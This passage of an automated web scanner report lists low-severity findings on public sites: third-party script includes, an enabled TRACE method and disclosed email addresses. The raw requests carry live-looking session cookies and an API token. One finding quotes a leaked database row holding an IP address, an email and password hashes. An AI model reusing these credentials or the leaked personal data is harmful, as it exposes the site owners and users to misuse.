bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}
Response
HTTP/1.1 200 OK.1.2.0.2 (TN;ecid=101360405795,0)/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"> </script>...[SNIP]... <script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"> </script><script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"> </script>...[SNIP]... <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'> </script>...[SNIP]... <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... <script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"> ...[SNIP]... ############## --><script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"> </script>...[SNIP]...
13.17. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... -global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.18. https://www.ca.com/us/register/forgotpassword.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/forgotpassword.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/forgotpassword.aspx HTTP/1.1/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... -global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.19. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://secure.addthis.com/js/250/addthis_widget.js
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... -global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The response dynamically includes the following scripts from other domains:http://edge.quantserve.com/quant.js http://www.google-analytics.com/urchin.js
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK...[SNIP]... <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> ...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]...
13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The response dynamically includes the following scripts from other domains:http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse http://api.recaptcha.net/js/recaptcha_ajax.js http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp http://pagead2.googlesyndication.com/pagead/show_ads.js http://w.sharethis.com/button/buttons.js http://widgets.dzone.com/links/widgets/zoneit.js http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"> </script>...[SNIP]... <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <script language="javascript" src="http://widgets.dzone.com/links/widgets/zoneit.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"> </script>...[SNIP]... <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium"> </script>...[SNIP]... <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>...[SNIP]... <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp"> </script>...[SNIP]... <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"> </script>...[SNIP]...
14. TRACE method is enabled
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.typepad.com
Path:
/
Issue description
The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.
Issue remediation
The TRACE method should be disabled on the web server.
Request
TRACE / HTTP/1.0789027bdcab58768
Response
HTTP/1.0 200 OK789027bdcab58768
15. Email addresses disclosed
previous
next
There are 9 instances of this issue:
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js HTTP/1.1.com/?p=12640;q=0.3.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK"...[SNIP]... klaus.hartl@stilbuero.de klaus.hartl@stilbuero.de ...[SNIP]...
15.2. http://pastebin.com/bq8xJPMn
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/bq8xJPMn
Issue detail
The following email address was disclosed in the response:
Request
GET /bq8xJPMn HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... 90119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com ', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')</div>...[SNIP]... 90119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com ', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')...[SNIP]...
15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s
Response
HTTP/1.1 200 OK...[SNIP]... tdd@tddsworld.com >...[SNIP]...
15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
Issue detail
The following email address was disclosed in the response:sammi@oriontransfer.co.nz
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s
Response
HTTP/1.1 200 OK.co.nz, sammi@oriontransfer.co.nz )(Effect))...[SNIP]...
15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
Issue detail
The following email address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK...[SNIP]... `cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="id@5s.tc @Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"...[SNIP]...
15.6. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The following email addresses were disclosed in the response:john.smith@company.com pmfkey@ca.com
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... pmfkey@ca.com ) for your initial access.</p>...[SNIP]... john.smith@company.com )<br />...[SNIP]...
15.7. https://www.ca.com/us/register/forgotpassword.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/forgotpassword.aspx
Issue detail
The following email address was disclosed in the response:
Request
POST /us/register/forgotpassword.aspx HTTP/1.1/register/forgotpassword.aspx-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351643167:ss=1315351389192ULLTE5NTE0OTU5ODEPZBYCAgEQZGQWCGYPZBYOAgkPFgQeBGhyZWYFImh0dHA6Ly93d3cuY2EuY29tL3VzL3Byb2R1Y3RzLmFzcHgeCWlubmVyaHRtbAUIcHJvZHVjdHNkAgoPFgQfAAUuaHR0cDovL3d3dy5jYS5jb20vdXMvY29tbXVuaX...[SNIP]...
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... xss@xss.cx " />...[SNIP]...
15.8. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following email address was disclosed in the response:
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... pmfkey@ca.com ) and click <a href="../register/forgotpassword.aspx">...[SNIP]...
15.9. http://www.kb.sony.com/selfservice/jslib/CalendarPopup.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/jslib/CalendarPopup.js
Issue detail
The following email address was disclosed in the response:
Request
GET /selfservice/jslib/CalendarPopup.js HTTP/1.1/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353074542
Response
